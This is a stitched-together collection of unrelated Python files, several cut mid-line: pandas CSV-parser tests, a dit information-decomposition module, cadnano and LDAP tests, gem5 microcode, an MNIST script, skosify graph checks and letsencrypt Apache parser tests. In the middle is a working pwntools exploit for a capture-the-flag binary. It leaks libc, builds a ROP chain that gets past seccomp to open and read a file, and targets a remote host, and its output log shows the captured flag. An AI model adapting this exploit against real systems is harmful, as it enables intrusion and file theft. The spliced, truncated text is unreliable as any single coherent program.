    data = " A B C\na b c\n1 3 7 0 3 6\n3 1 4 1 5 9"
    parser = python_parser_only
    expected = DataFrame.from_records(
        [(1, 3, 7, 0, 3, 6), (3, 1, 4, 1, 5, 9)],
        columns=list("abcABC"),
        index=list("abc"),
    )
    result = parser.read_csv(StringIO(data), sep=r"\s+")
    tm.assert_frame_equal(result, expected)


@pytest.mark.parametrize("add_footer", [True, False])
def test_skipfooter_with_decimal(python_parser_only, add_footer):
    # see gh-6971
    data = "1#2\n3#4"
    parser = python_parser_only
    expected = DataFrame({"a": [1.2, 3.4]})

    if add_footer:
        # The stray footer line should not mess with the
        # casting of the first two lines if we skip it.
        kwargs = {"skipfooter": 1}
        data += "\nFooter"
    else:
        kwargs = {}

    result = parser.read_csv(StringIO(data), names=["a"], decimal="#", **kwargs)
    tm.assert_frame_equal(result, expected)


@pytest.mark.parametrize(
    "sep", ["::", "#####", "!!!", "123", "#1!c5", "%!c!d", "@@#4:2", "_!pd#_"]
)
@pytest.mark.parametrize(
    "encoding", ["utf-16", "utf-16-be", "utf-16-le", "utf-32", "cp037"]
)
def test_encoding_non_utf8_multichar_sep(python_parser_only, sep, encoding):
    # see gh-3404
    expected = DataFrame({"a": [1], "b": [2]})
    parser = python_parser_only

    data = "1" + sep + "2"
    encoded_data = data.encode(encoding)

    result = parser.read_csv(
        BytesIO(encoded_data), sep=sep, names=["a", "b"], encoding=encoding
    )
    tm.assert_frame_equal(result, expected)


@pytest.mark.parametrize("quoting", [csv.QUOTE_MINIMAL, csv.QUOTE_NONE])
def test_multi_char_sep_quotes(python_parser_only, quoting):
    # see gh-13374: quoting is not supported with multi-char separators.
    kwargs = {"sep": ",,"}
    parser = python_parser_only

    data = 'a,,b\n1,,a\n2,,"2,,b"'

    if quoting == csv.QUOTE_NONE:
        msg = "Expected 2 fields in line 3, saw 3"
        with pytest.raises(ParserError, match=msg):
            parser.read_csv(StringIO(data), quoting=quoting, **kwargs)
    else:
        msg = "ignored when a multi-char delimiter is used"
        with pytest.raises(ParserError, match=msg):
            parser.read_csv(StringIO(data), quoting=quoting, **kwargs)


def test_none_delimiter(python_parser_only, capsys):
    # see gh-13374 and gh-17465
    parser = python_parser_only
    data = "a,b,c\n0,1,2\n3,4,5,6\n7,8,9"
    expected = DataFrame({"a": [0, 7], "b": [1, 8], "c": [2, 9]})

    # We expect the third line in the data to be
    # skipped because it is malformed, but we do
    # not expect any errors to occur.
    result = parser.read_csv(StringIO(data), header=0, sep=None, on_bad_lines="warn")
    tm.assert_frame_equal(result, expected)

    captured = capsys.readouterr()
    assert "Skipping line 3" in captured.err


@pytest.mark.parametrize("data", ['a\n1\n"b"a', 'a,b,c\ncat,foo,bar\ndog,foo,"baz'])
@pytest.mark.parametrize("skipfooter", [0, 1])
# NOTE(review): truncated at chunk boundary — the body of this test is not visible.
def test_skipfooter_bad_row(python_p
""" The I_downarrow unique measure, proposed by Griffith et al, and shown to be inconsistent. The idea is to measure unique information as the intrinsic mutual information between and source and the target, given the other sources. It turns out that these unique values are inconsistent, in that they produce differing redundancy values. """ from ..pid import BaseUniquePID from ...multivariate.secret_key_agreement import ( no_communication_skar, one_way_skar, two_way_skar, ) from ...utils import flatten __all__ = ( 'PID_SKAR_nw', 'PID_SKAR_owa', 'PID_SKAR_owb', 'PID_SKAR_tw', ) class PID_SKAR_nw(BaseUniquePID): """ The two-way secret key agreement rate partial information decomposition. Notes ----- This method progressively utilizes better bounds on the SKAR, and if even when using the tightest bounds does not result in a singular SKAR, nan is returned. """ _name = "I_>-<" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 >-< Y || X_1). Parameters ---------- d : Distribution The distribution to compute I_SKAR for. sources : iterable of iterables The source variables. target : iterable The target variable. Returns ------- i_skar_nw : dict The value of I_SKAR_nw for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = no_communication_skar(d, source, target, others) return uniques class PID_SKAR_owa(BaseUniquePID): """ The one-way secret key agreement rate partial information decomposition, source to target. """ _name = "I_>->" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 >-> Y || X_1). Parameters ---------- d : Distribution The distribution to compute I_SKAR for. sources : iterable of iterables The source variables. target : iterable The target variable. 
Returns ------- i_skar_owa : dict The value of I_SKAR_owa for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = one_way_skar(d, source, target, others) return uniques class PID_SKAR_owb(BaseUniquePID): """ The one-way secret key agreement rate partial information decomposition, target to source. """ _name = "I_<-<" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 <-< Y || X_1). Parameters ---------- d : Distribution The distribution to compute I_SKAR for. sources : iterable of iterables The source variables. target : iterable The target variable. Returns ------- i_skar_owb : dict The value of I_SKAR_owb for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = one_way_skar(d, target, source, others) return uniques class PID_SKAR_tw(BaseUniquePID): """ The two-way secret key agreement rate partial information decomposition. Notes ----- This method progressively utilizes better bounds on the SKAR, and if even when using the tightest bounds does not result in a singular SKAR, nan is returned. """ _name = "I_<->" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 <-> Y || X_1), when possible. Parameters
---------- d : Distribution The distribution to compute I_SKAR for. sources : iterable of iterables The source variables. target : iterable The target variable. Returns ------- i_sk
ar_tw : dict The value of I_SKAR_tw for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = two_way_skar(d, [source, target], others) return uniques
# To run:
# pytest -c cadnano/tests/pytestgui.ini cadnano/tests/
import pytest
from PyQt5.QtCore import Qt, QPointF
from PyQt5.QtTest import QTest

from cadnano.fileio.lattice import HoneycombDnaPart
from cadnano.views.sliceview import slicestyles
from cnguitestcase import GUITestApp


@pytest.fixture()
def cnapp():
    # Fresh GUI application per test; tearDown releases the Qt resources.
    app = GUITestApp()
    yield app
    app.tearDown()


DELAY = 5  # milliseconds
RADIUS = slicestyles.SLICE_HELIX_RADIUS


####################### Standard Functional Tests ########################
def testCreateVirtualHelixGui(cnapp):
    """Create some VHs"""
    # Create a new Honeycomb part via its toolbar button.
    toolbar = cnapp.window.main_toolbar
    action_new_honeycomb = toolbar.widgetForAction(cnapp.window.action_new_dnapart_honeycomb)
    QTest.mouseClick(action_new_honeycomb, Qt.LeftButton, delay=DELAY)
    slicerootitem = cnapp.window.views['slice'].root_item
    assert len(slicerootitem.instance_items) == 1
    slice_part_item = list(slicerootitem.instance_items.values())[0]
    # Key presses select the helix-creation tool before clicking the lattice.
    QTest.keyClick(cnapp.window, Qt.Key_H, delay=DELAY)
    QTest.keyClick(cnapp.window, Qt.Key_C, delay=DELAY)
    cnapp.processEvents()
    cmd_count = 1  # already added the part
    # Click a 4x4 patch of honeycomb lattice coordinates to create helices.
    for row in range(-2, 2):
        for col in range(-2, 2):
            # print(row, col)
            x, y = HoneycombDnaPart.latticeCoordToModelXY(RADIUS, row, col)
            pt = QPointF(x, y)
            cnapp.graphicsItemClick(slice_part_item, Qt.LeftButton, pos=pt, delay=DELAY)
            cmd_count += 1
    cnapp.processEvents()
    vh_count = len(cnapp.document.activePart().getidNums())
    # undo and redo all; the helix count must survive the round trip.
    for i in range(cmd_count):
        cnapp.document.undoStack().undo()
        cnapp.processEvents()
    for i in range(cmd_count):
        cnapp.document.undoStack().redo()
        cnapp.processEvents()
    part = list(cnapp.document.children())[0]
    vh_count_after_redo = len(part.getidNums())
    assert vh_count == vh_count_after_redo
    # import time
    # time.sleep(3)
# end def
# Copyright (c) 2007-2008 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder.  You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black

# gem5 x86 microcode for the near/far RET macro-ops. The string content is
# consumed by gem5's microcode assembler at build time.
# NOTE(review): this chunk's line breaks were mangled; the line structure
# inside the string below was reconstructed from the microcode's own syntax
# (one micro-op or directive per line) — verify against the upstream file.
microcode = '''
def macroop RET_NEAR {
    # Make the default data size of rets 64 bits in 64 bit mode
    .adjust_env oszIn64Override

    ld t1, ss, [1, t0, rsp]
    # Check address of return
    addi rsp, rsp, dsz
    wripi t1, 0
};

def macroop RET_NEAR_I {
    # Make the default data size of rets 64 bits in 64 bit mode
    .adjust_env oszIn64Override

    limm t2, imm
    ld t1, ss, [1, t0, rsp]
    # Check address of return
    addi rsp, rsp, dsz
    add rsp, rsp, t2
    wripi t1, 0
};

def macroop RET_FAR {
    .adjust_env oszIn64Override

    # Get the return RIP
    ld t1, ss, [1, t0, rsp]
    # Get the return CS
    ld t2, ss, [1, t0, rsp], ssz
    # Get the rpl
    andi t3, t2, 0x3
    # Get the cpl

    # Here we'd check if we're changing priviledge levels. We'll just hope
    # that doesn't happen yet.

    # Do stuff if they're equal
    andi t0, t2, 0xFC, flags=(EZF,), dataSize=2
    br label("processDescriptor"), flags=(CEZF,)
    andi t3, t2, 0xF8, dataSize=8
    andi t0, t2, 0x4, flags=(EZF,), dataSize=2
    br label("globalDescriptor"), flags=(CEZF,)
    ld t3, tsl, [1, t0, t3], dataSize=8
    br label("processDescriptor")
globalDescriptor:
    ld t3, tsg, [1, t0, t3], dataSize=8
processDescriptor:
    chks t2, t3, IretCheck, dataSize=8
    # There should be validity checks on the RIP checks here, but I'll do
    # that later.
    wrdl cs, t3, t2
    wrsel cs, t2
    wrip t0, t1
    br label("end")

    # Do other stuff if they're not.
end:
    fault "NoFault"
};
'''
import unittest

from plow.ldapadaptor import LdapAdaptor


class FakeLA(LdapAdaptor):
    """LdapAdaptor stand-in whose connection setup is a no-op."""

    def bind(self, *args):
        """No-op: a fake adaptor never talks to a server."""

    initialize = bind


class Test_Ldap_DN_Compare(unittest.TestCase):
    """Exercise DN comparison with and without case sensitivity."""

    def setUp(self):
        self.ldap_case_i = FakeLA("uri", "base", case_insensitive_dn=True)
        self.ldap_case_s = FakeLA("uri", "base")

    def _do_compare(self, ref, other, res, case_sensitive=True):
        # Select the adaptor that implements the requested case behaviour.
        adaptor = self.ldap_case_s if case_sensitive else self.ldap_case_i
        match = adaptor.compare_dn(ref, other)
        if res:
            self.assertTrue(
                match,
                "Expected '{0}' to match '{1}' (Case Sensitive: {2})".format(ref, other, case_sensitive),
            )
        else:
            self.assertFalse(
                match,
                "'{0}' and '{1}' should not match (Case Sensitive: {2})".format(ref, other, case_sensitive),
            )

    def test_basic(self):
        # Same DN differing only in case: mismatch when sensitive, match otherwise.
        self._do_compare("CN=Test", "CN=test", False, case_sensitive=True)
        self._do_compare("CN=Test", "CN=test", True, case_sensitive=False)

    def test_spaces(self):
        # Whitespace around components and '=' must not affect equality,
        # while whitespace inside a value is significant.
        cases = (
            ("CN=Test, OU=Base", "CN=Test,OU=Base"),
            (" CN = Test,OU = Base ", "CN=Test,OU=Base"),
            (" CN = Te st ", "CN=Te st"),
        )
        for ref, other in cases:
            self._do_compare(ref, other, True)


if __name__ == '__main__':
    unittest.main()
# Script used to create Mnist_mini and Mnist_full datasets.
import numpy as np
from sklearn.datasets import fetch_mldata
from pandas import DataFrame

# Default download location for caching is
# ~/scikit_learn_data/mldata/mnist-original.mat unless specified otherwise.
mnist = fetch_mldata('MNIST original')

# Build a DataFrame of pixel values, attach the digit label as 'class',
# and split the rows per digit.
frame = DataFrame(mnist.data)
frame['class'] = mnist.target

# Emit one tab-separated file per class under the Dataset directory.
for label, members in frame.groupby('class'):
    digit = int(label)
    # Mini subset (classes 0 and 1, first 200 rows each) for faster testing.
    if digit < 2:
        np.savetxt(fname='Dataset/Mnist_mini/Class' + str(digit) + '.txt',
                   X=members[:200], fmt='%d', delimiter='\t', newline='\n')
    # Full dataset, written for every class.
    np.savetxt(fname='Dataset/Mnist_full/Class' + str(digit) + '.txt',
               X=members, fmt='%d', delimiter='\t', newline='\n')
les, status)
        status[node] = 2  # set this node as completed
    elif status.get(node) == 1:  # has been entered but not yet done
        if break_cycles:
            logging.warning("Hierarchy cycle removed at %s -> %s",
                            localname(parent), localname(node))
            rdf.remove((node, SKOS.broader, parent))
            rdf.remove((node, SKOS.broaderTransitive, parent))
            rdf.remove((node, SKOSEXT.broaderGeneric, parent))
            rdf.remove((node, SKOSEXT.broaderPartitive, parent))
            rdf.remove((parent, SKOS.narrower, node))
            rdf.remove((parent, SKOS.narrowerTransitive, node))
        else:
            logging.warning(
                "Hierarchy cycle detected at %s -> %s, "
                "but not removed because break_cycles is not active",
                localname(parent), localname(node))
    elif status.get(node) == 2:  # is completed already
        pass


def hierarchy_cycles(rdf, fix=False):
    """Check if the graph contains skos:broader cycles and optionally break these.

    :param Graph rdf: An rdflib.graph.Graph object.
    :param bool fix: Fix the problem by removing any skos:broader that
                     overlaps with skos:broaderTransitive.
    """
    top_concepts = sorted(rdf.subject_objects(SKOS.hasTopConcept))
    status = {}
    # Depth-first search from each top concept; `status` marks visited nodes.
    for cs, root in top_concepts:
        _hierarchy_cycles_visit(
            rdf, root, None, fix, status=status)
    # double check that all concepts were actually visited in the search,
    # and visit remaining ones if necessary
    recheck_top_concepts = False
    for conc in sorted(rdf.subjects(RDF.type, SKOS.Concept)):
        if conc not in status:
            recheck_top_concepts = True
            _hierarchy_cycles_visit(
                rdf, conc, None, fix, status=status)
    return recheck_top_concepts


def disjoint_relations(rdf, fix=False):
    """Check if the graph contains concepts connected by both of the
    semantically disjoint properties skos:related and
    skos:broaderTransitive (S27), and optionally remove the involved
    skos:related relations.

    :param Graph rdf: An rdflib.graph.Graph object.
    :param bool fix: Fix the problem by removing skos:related relations
                     that overlap with skos:broaderTransitive.
    """
    for conc1, conc2 in sorted(rdf.subject_objects(SKOS.related)):
        # conc2 being a transitive broader of conc1 means the pair is also
        # hierarchically related, which S27 forbids alongside skos:related.
        if conc2 in sorted(rdf.transitive_objects(conc1, SKOS.broader)):
            if fix:
                logging.warning(
                    "Concepts %s and %s connected by both "
                    "skos:broaderTransitive and skos:related, "
                    "removing skos:related",
                    conc1, conc2)
                rdf.remove((conc1, SKOS.related, conc2))
                rdf.remove((conc2, SKOS.related, conc1))
            else:
                logging.warning(
                    "Concepts %s and %s connected by both "
                    "skos:broaderTransitive and skos:related, "
                    "but keeping it because keep_related is enabled",
                    conc1, conc2)


def hierarchical_redundancy(rdf, fix=False):
    """Check for and optionally remove extraneous skos:broader relations.

    :param Graph rdf: An rdflib.graph.Graph object.
    :param bool fix: Fix the problem by removing skos:broader relations
                     between concepts that are otherwise connected by
                     skos:broaderTransitive.
    """
    for conc, parent1 in sorted(rdf.subject_objects(SKOS.broader)):
        for parent2 in sorted(rdf.objects(conc, SKOS.broader)):
            if parent1 == parent2:
                continue  # must be different
            if parent2 in rdf.transitive_objects(parent1, SKOS.broader):
                # parent2 is reachable via parent1, so the direct link to
                # parent2 is redundant.
                if fix:
                    logging.warning(
                        "Eliminating redundant hierarchical relationship: "
                        "%s skos:broader %s", conc, parent2)
                    rdf.remove((conc, SKOS.broader, parent2))
                    rdf.remove((conc, SKOS.broaderTransitive, parent2))
                    rdf.remove((parent2, SKOS.narrower, conc))
                    rdf.remove((parent2, SKOS.narrowerTransitive, conc))
                else:
                    logging.warning(
                        "Redundant hierarchical relationship "
                        "%s skos:broader %s found, but not eliminated "
                        "because eliminate_redundancy is not set",
                        conc, parent2)


def preflabel_uniqueness(rdf, policy='all'):
    """Check that concepts have no more than one value of skos:prefLabel per
    language tag (S14), and optionally move additional values to
    skos:altLabel.

    :param Graph rdf: An rdflib.graph.Graph object.
    :param str policy: Policy for deciding which value to keep as prefLabel
        when multiple prefLabels are found. Possible values are 'shortest'
        (keep the shortest label), 'longest' (keep the longest label),
        'uppercase' (prefer uppercase), 'lowercase' (prefer lowercase) or
        'all' (keep all, just log the problems). Alternatively, a list of
        policies to apply in order, such as ['shortest', 'lowercase'], may
        be used.
    """
    resources = set(
        (res for res, label in rdf.subject_objects(SKOS.prefLabel)))

    # Each policy maps a label to a sort key; the label with the SMALLEST
    # key wins (e.g. 'uppercase' penalizes labels starting lowercase).
    policy_fn = {
        'shortest': len,
        'longest': lambda x: -len(x),
        'uppercase': lambda x: int(x[0].islower()),
        'lowercase': lambda x: int(x[0].isupper())
    }

    if type(policy) not in (list, tuple):
        policies = policy.split(',')
    else:
        policies = policy

    for p in policies:
        if p not in policy_fn:
            logging.critical("Unknown preflabel-policy: %s", policy)
            return

    def key_fn(label):
        # Apply policies in order; the label's string value is the final
        # tie-breaker so the choice is deterministic.
        return [policy_fn[p](label) for p in policies] + [str(label)]

    for res in sorted(resources):
        prefLabels = {}
        for label in rdf.objects(res, SKOS.prefLabel):
            lang = label.language
            if lang not in prefLabels:
                prefLabels[lang] = []
            prefLabels[lang].append(label)
        for lang, labels in prefLabels.items():
            if len(labels) > 1:
                if policies[0] == 'all':
                    logging.warning(
                        "Resource %s has more than one prefLabel@%s, "
                        "but keeping all of them due to preflabel-policy=all.",
                        res, lang)
                    continue

                chosen = sorted(labels, key=key_fn)[0]
                logging.warning(
                    "Resource %s has more than one prefLabel@%s: "
                    "choosing %s (policy: %s)",
                    res, lang, chosen, str(policy))
                # Demote every non-chosen prefLabel to altLabel.
                for label in labels:
                    if label != chosen:
                        rdf.remove((res, SKOS.prefLabel, label))
                        rdf.add((res, SKOS.altLabel, label))


def label_overlap(rdf, fix=False):
    """Check if concepts have the same value for any two of the pairwise
    disjoint properties skos:prefLabel, skos:altLabel and skos:hiddenLabel
    (S13), and optionally remove the least significant property.

    :param Graph rdf: An rdflib.graph.Graph object.
    :param bool fix: Fix the problem by removing the least significant
                     property (altLabel or hiddenLabel).
    """
    def label_warning(res, label, keep, remove):
        # Shared warning helper; the message reflects whether a fix is made.
        if fix:
            logging.warning(
                "Resource %s has '%s'@%s as both %s and %s; removing %s",
                res, label, label.language, keep, remove, remove
            )
        else:
            logging.warning(
                "Resource %s has '%s'@%s as both %s and %s",
                res, label, label.language, keep, remove
            )

    for res, label in find_prop_overlap(rdf, SKOS.prefLabel, SKOS.altLabel):
        label_warning(res, label, 'prefLabel', 'altLabel')
        if fix:
            rdf.remove((res, SKOS.altLabel, label))

    for res, label in find_prop_overlap(rdf, SKOS.prefLabel, SKOS.hiddenLabel):
        label_warning(res, label, 'prefLabel', 'hiddenLabel')
        if fix:
#!/usr/bin/env python2 # -*- coding: utf-8 -*- from pwn import * context(arch='amd64', os='linux', aslr=False, terminal=['tmux', 'neww']) env = {'LD_PRELOAD': './libc.so.6'} if args['GDB']: io = gdb.debug( './artifact-amd64-2.24-9ubuntu2.2', env=env, gdbscript='''\ set follow-fork-mode parent b *0x555555554ba6 c ''') elf, libc = io.elf, ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so') elif args['REMOTE']: io = remote('52.192.178.153', 31337) elf, libc = ELF('./artifact'), ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so') else: io = process('./artifact-amd64-2.24-9ubuntu2.2', env=env) elf, libc = io.elf, ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so') # the binary allows reading and writing to arbitrary locations # the tricky part was finding how to bypass the seccomp rules # enforced with prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...), since # the "official" tool to disassemble BPF bytecode provided by libseccomp doesn't handle # the BPF_X opcode correctly (and shows wrong rules) # luckily, https://github.com/niklasb/dump-seccomp seems to extract the correct rules: # prctl(PR_SET_NO_NEW_PRIVS) # prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...) 
# fprog @ 00007fffffffdd70 # 20 blocks @ 00007fffffffdd80 # Disassembly: # l0: ld [4] # l1: jeq #0xc000003e, l2, l18 # l2: ld [32] # l3: tax # l4: ld [0] # l5: jeq #0, l19, l6 # l6: jeq #0x1, l19, l7 # l7: jeq #0x5, l19, l8 # l8: jeq #0x8, l19, l9 # l9: jeq #0x9, l11, l10 # l10: jeq #0xa, l11, l14 # l11: txa # l12: and #0x1 # l13: jeq #0x1, l18, l19 # l14: jeq x, l19, l15 # l15: jeq #0xc, l19, l16 # l16: jeq #0x3c, l19, l17 # l17: jeq #0xe7, l19, l18 # l18: ret #0 # l19: ret #0x7fff0000 # at l14, syscalls in which rax == rdx are allowed to run: this means # we can execute open(..., ..., 2) # find the address of libc io.recvuntil('Choice?\n') io.sendline('1') io.recvuntil('Idx?\n') index = 0x650 / 8 + 1 io.sendline(str(index)) a_libc_address = int(io.recvline()[len('Here it is: '):]) libc.address = a_libc_address - 0x0000000000020300 - 241 success('libc.address: %s' % hex(libc.address)) # find any writeable location buf = libc.address + 0x3c1800 # read a filename into buf, open the file, read its content and write it back rop = ROP(libc) rop.read(0, buf, 5) rop.open(buf, 0, 2) rop.read(3, buf, 50) rop.write(1, buf, 50) # set up the ROP chain in the stack raw_rop = str(rop) for i, address in enumerate([u64(raw_rop[i:i + 8]) for i in range(0, len(raw_rop), 8)]): print 'Sending', i io.recvuntil('Choice?\n') io.sendline('2') io.recvuntil('Idx?\n') index = 0x650 / 8 + 1 + i io.sendline(str(index)) io.recvuntil('Give me your number:\n') io.sendline(str(address)) # exit to trigger ROP execution io.recvuntil('Choice?\n') io.sendline('3') sleep(0.1) io.send('flag\x00') io.interactive()
# $ ./artifact.py REMOTE # [+] Opening connection to 52.192.178.153 on port 31337: Done # [*] '/home/ubuntu/
vbox/artifact-4c4375825c4a08ae9d14492b34b3bddd/artifact' # Arch: amd64-64-little # RELRO: Full RELRO # Stack: Canary found # NX: NX enabled # PIE: PIE enabled # [*] '/home/ubuntu/vbox/artifact-4c4375825c4a08ae9d14492b34b3bddd/libc.so.6' # Arch: amd64-64-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX enabled # PIE: PIE enabled # [+] libc.address: 0x7fed4d6ab000 # [*] Loaded cached gadgets for './libc.so.6' # Sending 0 # Sending 1 # . . . # Sending 30 # Sending 31 # [*] Switching to interactive mode # hitcon{why_libseccomp_cheated_me_Q_Q}
r letsencrypt_apache.parser."""
import os
import shutil
import unittest

import augeas
import mock

from letsencrypt import errors

from letsencrypt_apache.tests import util


class BasicParserTest(util.ParserTest):
    """Apache Parser Test."""

    def setUp(self):  # pylint: disable=arguments-differ
        super(BasicParserTest, self).setUp()

    def tearDown(self):
        # Remove the per-test scratch directories created by the fixture.
        shutil.rmtree(self.temp_dir)
        shutil.rmtree(self.config_dir)
        shutil.rmtree(self.work_dir)

    def test_find_config_root_no_root(self):
        # pylint: disable=protected-access
        os.remove(self.parser.loc["root"])
        self.assertRaises(
            errors.NoInstallationError, self.parser._find_config_root)

    def test_parse_file(self):
        """Test parse_file.

        letsencrypt.conf is chosen as the test file as it will not be
        included during the normal course of execution.

        """
        file_path = os.path.join(
            self.config_path, "not-parsed-by-default", "letsencrypt.conf")

        self.parser._parse_file(file_path)  # pylint: disable=protected-access

        # search for the httpd incl
        matches = self.parser.aug.match(
            "/augeas/load/Httpd/incl [. ='%s']" % file_path)

        self.assertTrue(matches)

    def test_find_dir(self):
        test = self.parser.find_dir("Listen", "80")
        # This will only look in enabled hosts
        test2 = self.parser.find_dir("documentroot")

        self.assertEqual(len(test), 1)
        self.assertEqual(len(test2), 4)

    def test_add_dir(self):
        aug_default = "/files" + self.parser.loc["default"]
        self.parser.add_dir(aug_default, "AddDirective", "test")

        self.assertTrue(
            self.parser.find_dir("AddDirective", "test", aug_default))

        self.parser.add_dir(aug_default, "AddList", ["1", "2", "3", "4"])
        matches = self.parser.find_dir("AddList", None, aug_default)
        for i, match in enumerate(matches):
            self.assertEqual(self.parser.aug.get(match), str(i + 1))

    def test_add_dir_to_ifmodssl(self):
        """test add_dir_to_ifmodssl.

        Path must be valid before attempting to add to augeas

        """
        from letsencrypt_apache.parser import get_aug_path
        # This makes sure that find_dir will work
        self.parser.modules.add("mod_ssl.c")

        self.parser.add_dir_to_ifmodssl(
            get_aug_path(self.parser.loc["default"]),
            "FakeDirective", ["123"])

        matches = self.parser.find_dir("FakeDirective", "123")

        self.assertEqual(len(matches), 1)
        self.assertTrue("IfModule" in matches[0])

    def test_add_dir_to_ifmodssl_multiple(self):
        from letsencrypt_apache.parser import get_aug_path
        # This makes sure that find_dir will work
        self.parser.modules.add("mod_ssl.c")

        self.parser.add_dir_to_ifmodssl(
            get_aug_path(self.parser.loc["default"]),
            "FakeDirective", ["123", "456", "789"])

        matches = self.parser.find_dir("FakeDirective")

        self.assertEqual(len(matches), 3)
        self.assertTrue("IfModule" in matches[0])

    def test_get_aug_path(self):
        from letsencrypt_apache.parser import get_aug_path
        self.assertEqual("/files/etc/apache", get_aug_path("/etc/apache"))

    def test_set_locations(self):
        with mock.patch("letsencrypt_apache.parser.os.path") as mock_path:
            # Simulate neither candidate config file existing on disk.
            mock_path.isfile.side_effect = [False, False]

            # pylint: disable=protected-access
            results = self.parser._set_locations()

            self.assertEqual(results["default"], results["listen"])
            self.assertEqual(results["default"], results["name"])

    @mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg")
    def test_update_runtime_variables(self, mock_cfg):
        # Canned `apachectl -D DUMP_RUN_CFG` output; only Define: lines
        # should end up in parser.variables.
        mock_cfg.return_value = (
            'ServerRoot: "/etc/apache2"\n'
            'Main DocumentRoot: "/var/www"\n'
            'Main ErrorLog: "/var/log/apache2/error.log"\n'
            'Mutex ssl-stapling: using_defaults\n'
            'Mutex ssl-cache: using_defaults\n'
            'Mutex default: dir="/var/lock/apache2" mechanism=fcntl\n'
            'Mutex watchdog-callback: using_defaults\n'
            'PidFile: "/var/run/apache2/apache2.pid"\n'
            'Define: TEST\n'
            'Define: DUMP_RUN_CFG\n'
            'Define: U_MICH\n'
            'Define: TLS=443\n'
            'Define: example_path=Documents/path\n'
            'User: name="www-data" id=33 not_used\n'
            'Group: name="www-data" id=33 not_used\n'
        )
        expected_vars = {"TEST": "", "U_MICH": "", "TLS": "443",
                         "example_path": "Documents/path"}

        self.parser.update_runtime_variables()
        self.assertEqual(self.parser.variables, expected_vars)

    @mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg")
    def test_update_runtime_vars_bad_output(self, mock_cfg):
        mock_cfg.return_value = "Define: TLS=443=24"
        self.parser.update_runtime_variables()

        mock_cfg.return_value = "Define: DUMP_RUN_CFG\nDefine: TLS=443=24"
        self.assertRaises(
            errors.PluginError, self.parser.update_runtime_variables)

    @mock.patch("letsencrypt_apache.constants.os_constant")
    @mock.patch("letsencrypt_apache.parser.subprocess.Popen")
    def test_update_runtime_vars_bad_ctl(self, mock_popen, mock_const):
        mock_popen.side_effect = OSError
        mock_const.return_value = "nonexistent"
        self.assertRaises(
            errors.MisconfigurationError,
            self.parser.update_runtime_variables)

    @mock.patch("letsencrypt_apache.parser.subprocess.Popen")
    def test_update_runtime_vars_bad_exit(self, mock_popen):
        mock_popen().communicate.return_value = ("", "")
        mock_popen.returncode = -1
        self.assertRaises(
            errors.MisconfigurationError,
            self.parser.update_runtime_variables)


class ParserInitTest(util.ApacheTest):
    """ApacheParser construction: root normalization and failure modes."""

    def setUp(self):  # pylint: disable=arguments-differ
        super(ParserInitTest, self).setUp()
        self.aug = augeas.Augeas(
            flags=augeas.Augeas.NONE | augeas.Augeas.NO_MODL_AUTOLOAD)

    def tearDown(self):
        shutil.rmtree(self.temp_dir)
        shutil.rmtree(self.config_dir)
        shutil.rmtree(self.work_dir)

    @mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg")
    def test_unparsable(self, mock_cfg):
        from letsencrypt_apache.parser import ApacheParser

        mock_cfg.return_value = ('Define: TEST')
        self.assertRaises(
            errors.PluginError,
            ApacheParser, self.aug, os.path.relpath(self.config_path),
            "/dummy/vhostpath", version=(2, 2, 22))

    def test_root_normalized(self):
        from letsencrypt_apache.parser import ApacheParser

        with mock.patch("letsencrypt_apache.parser.ApacheParser."
                        "update_runtime_variables"):
            # Redundant separators and '..' segments must collapse away.
            path = os.path.join(
                self.temp_dir,
                "debian_apache_2_4/////multiple_vhosts/../multiple_vhosts/apache2")
